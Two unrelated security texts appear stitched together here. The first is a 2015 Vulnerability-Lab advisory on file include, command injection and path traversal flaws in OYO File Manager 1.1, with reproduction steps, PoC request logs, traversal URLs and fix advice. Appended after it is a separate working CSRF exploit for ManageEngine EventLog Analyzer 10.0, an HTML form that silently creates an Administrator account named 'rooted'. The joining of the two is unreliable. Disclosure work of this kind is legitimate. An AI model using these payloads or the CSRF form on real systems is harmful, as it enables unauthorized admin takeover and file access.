www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Document Title: =============== OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1494 Release Date: ============= 2015-05-18 Vulnerability Laboratory ID (VL-ID): ==================================== 1493 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== OYO File Manager, helps you to manage files in your mobile from your computer over wifi, without USB cable. Also, view your photo albums, play songs and videos. Store files in drive page and do all the file operations, such as Create, Move, Delete, Edit, Copy, Rename, Zip, unzip, and get information about file. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/oyo-file-manager/id981145759 & https://play.google.com/store/apps/details?id=com.whatbig.filemanager ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research team discovered multiple Vulnerabilities in the official OYO File Manager v1.1 iOS & Android mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Balaji Rajan Product: OYO File Manager - iOS & Android 1.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 Local File Include Vulnerability A local file include web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. The file include vulnerability allows remote attackers to unauthorized include local file/path requests to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `upload(GCDWebUploader)` module. Attackers are able to inject own files with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Injects are also possible via local file sync function. Local attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious attack requests. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] upload (GCDWebUploader) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:8080/) 1.2 Local Command Injection Vulnerability A local command inject web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. The issue allows remote attackers to inject own commands by usage of stable device values to compromise the ios or android mobile web-application. The command inject vulnerability is located in the vulnerable `devicename` value of the `index` module. Local attackers are able to inject own own malicious system specific commands to requests the vulnerable `devicename` value. The devicename value is displayed in the header location of the file dir index module. The execution point is in the main index context and the injection point is the local device to app sync. The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account. Local attackers are also able to exploit the devicename validation issue in combination with persistent injected script codes. The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. Exploitation of the command/path inject vulnerability requires a low privileged ios/android device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands to compromise the mobile Android/iOS application or the connected device components. Request Method(s): [+] [SYNC] Vulnerable Module(s): [+] Path Listing Vulnerable Parameter(s): [+] devicename 1.3 Remote Path Traversal Vulnerability A Path Traveral web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. The security vulnerability allows remote attackers to unauthorized request system path variables to compromise the mobile application or device. The vulnerability is located in the `path` value of the `open and list` interface module. Remote attackers are able to change the path variable to unauthorized request device files or directories. The vulnerability can be exploited by local or remote attackers without user interaction. The attack vector is located on the application-side of the service and the request method to execute is GET (client-side). The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the vulnerability results in mobile application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] open [+] list Vulnerable Parameter(s): [+] path Affected Module(s): [+] Index File Dir Listing (http://localhost:8080/) Proof of Concept (PoC): ======================= 1.1 The file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the interface 2. Start a session tamper 3. Upload a reandom file 4. Change in the upload POST method request the vulnerable filename to a local file variable Note: The website reloads 5. The execution occurs in the main file dir index were the upload has been replaced 6. Successful reproduce of the mobile web vulnerability! --- PoC Session Logs [POST] --- Status: 200[OK] POST http://localhost/upload Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost/] Content-Length[831] Content-Type[multipart/form-data; boundary=---------------------------33361466725643] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: POST_DATA[-----------------------------33361466725643 Content-Disposition: form-data; name="path"/test23/ -----------------------------33361466725643 Content-Disposition: form-data; name="files[]"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png" Content-Type: image/png - Response Status=OK - 200 Server=GCDWebUploader Cache-Control=no-cache Content-Length=2 Content-Type=application/json Connection=Close Date=Tue, 12 May 2015 12:24:23 GMT Reference(s): http://localhost/upload 1.2 The local command inject web vulnerability can be exploited by local attackers with low privilege application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the android or ios application to your device 2. Start the application 3. Change the local devicename value in the ios settings to a own payload string (local command inject) 4. Save the settings 5. Open the wifi interface and watch the index webserver site 6. The execution occurs in the header location of the webpage were the devicename value is visible 6. Successful reproduce of the mobile web vulnerability! PoC: <spna><img src="img/OYO.png" alt="OYO" style="margin-left:-30px;" height="87" width="87"><span> </span> <span style="font-size:20px;">[LOCAL COMMAND INJECT VULNERABILITY!]23</span> <span style="font-size: 15px;color: #CCCCCC;">IOS Version 8.3</span> <span style="float:right;font-size:18px;width:400px;"> <div class="progress"> <div class="progress-bar progress-bar-success" role="progressbar" aria-valuenow="1394098176.00" aria-valuemin="0" aria-valuemax="12.74" style="width:95.22%"> 25.89 GB used</div> <!-- <span style="font-size:10px;padding-left:20px;padding-bottom:5px;"> 1.30 GB Free Space</span>--> <!-- Drag & drop files OR Just upload your Files--> <div class="progress-bar progress-bar-warning" role="progressbar" aria-valuenow="25.89 GB" aria-valuemin="0" aria-valuemax="12.74" style="width:4.78%"> 1.30 GB free space </div></div></span></spna> 1.3 the path traversal web vulnerability can be exploited by remote attackers without user interaction or privilege web application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Payload(s) http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ http://localhost/open?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ http://localhost/download?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ --- PoC Session Logs [GET] --- Status: 200[OK] GET http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[59] Mime Type[application/json] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost/] Connection[keep-alive] Response Header: Server[GCDWebUploader] Cache-Control[no-cache] Content-Length[59] Content-Type[application/json] Connection[Close] Date[Tue, 12 May 2015 12:24:25 GMT] 14:21:43.214[9ms][total 9ms] Status: 200[OK] GET http://localhost/open?path=/%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_NORMAL] Größe des Inhalts[538] Mime Type[image/png] Request Header: Host[localhost] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost/] Connection[keep-alive] Response Header: Etag[8831597/1431433463/0] Last-Modified[Tue, 12 May 2015 12:24:23 GMT] Server[GCDWebUploader] Content-Type[image/png] Content-Length[538] Connection[Close] Date[Tue, 12 May 2015 12:24:25 GMT] Cache-Control[no-cache] Reference(s): http://localhost/list?path= http://localhost/open?path= http://localhost/download?path= Solution - Fix & Patch: ======================= 1.1 The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request. Restrict the input and disallow special chars. Parse the output in the file dir index list to prevent local file include attacks via upload. 1.2 Restrict the devicename value and disallow special chars. Encode the devicename value to prevent local command injection attacks. 1.3 The directory traversal web vulnerability can be patched by a secure restriction and parse of the path name value in the open and list module context. Encode the input of files to folders and disallow special chars. Implement a whitelist or a exception to prevent unauthorized path value requests via GET method. Security Risk: ============== 1.1 The security risk of the local file include web vulnerability in the filename value of the manager is estimated as high. (CVSS 6.5) 1.2 The security risk of the local command inject web vulnerability in the devicename value of the manager is estimated as high. (CVSS 5.6) 1.3 The security risk of the path traversal web vulnerability in the path value of the manager is estimated as high. (CVSS 6.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

<!-- [+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site Request Forgery Exploit [+] Date: 31/03/2015 [+] Exploit Author: Akash S. Chavan [+] Vendor Homepage: https://www.manageengine.com/ [+] Software Link: https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe [+] Version: Version: 10.0, Build Number: 10001 [+] Tested on: Windows 8.1/PostgreSQL --> <html> <body> <form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST"> <input type="hidden" name="domainId" value="" /> <input type="hidden" name="roleId" value="" /> <input type="hidden" name="addField" value="true" /> <input type="hidden" name="userType" value="Administrator" /> <input type="hidden" name="userName" value="rooted" /> <input type="hidden" name="pwd1" value="admin" /> <input type="hidden" name="password" value="admin" /> <input type="hidden" name="userGroup" value="Administrator" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="AddSubmit" value="Add&#32;User" /> <input type="hidden" name="alpha" value="" /> <input type="hidden" name="userIds" value="" /> <input type="hidden" name="roleName" value="" /> <input type="hidden" name="selDevices" value="" /> <input type="hidden" name="doAction" value="" /> <input type="hidden" name="productName" value="eventlog" /> <input type="hidden" name="licType" value="Prem" /> <input type="hidden" name="next" value="" /> <input type="hidden" name="currentUserId" value="1" /> <input type="hidden" name="isAdminServer" value="false" /> <input type="submit" value="Click Me" /> </form> </body> </html>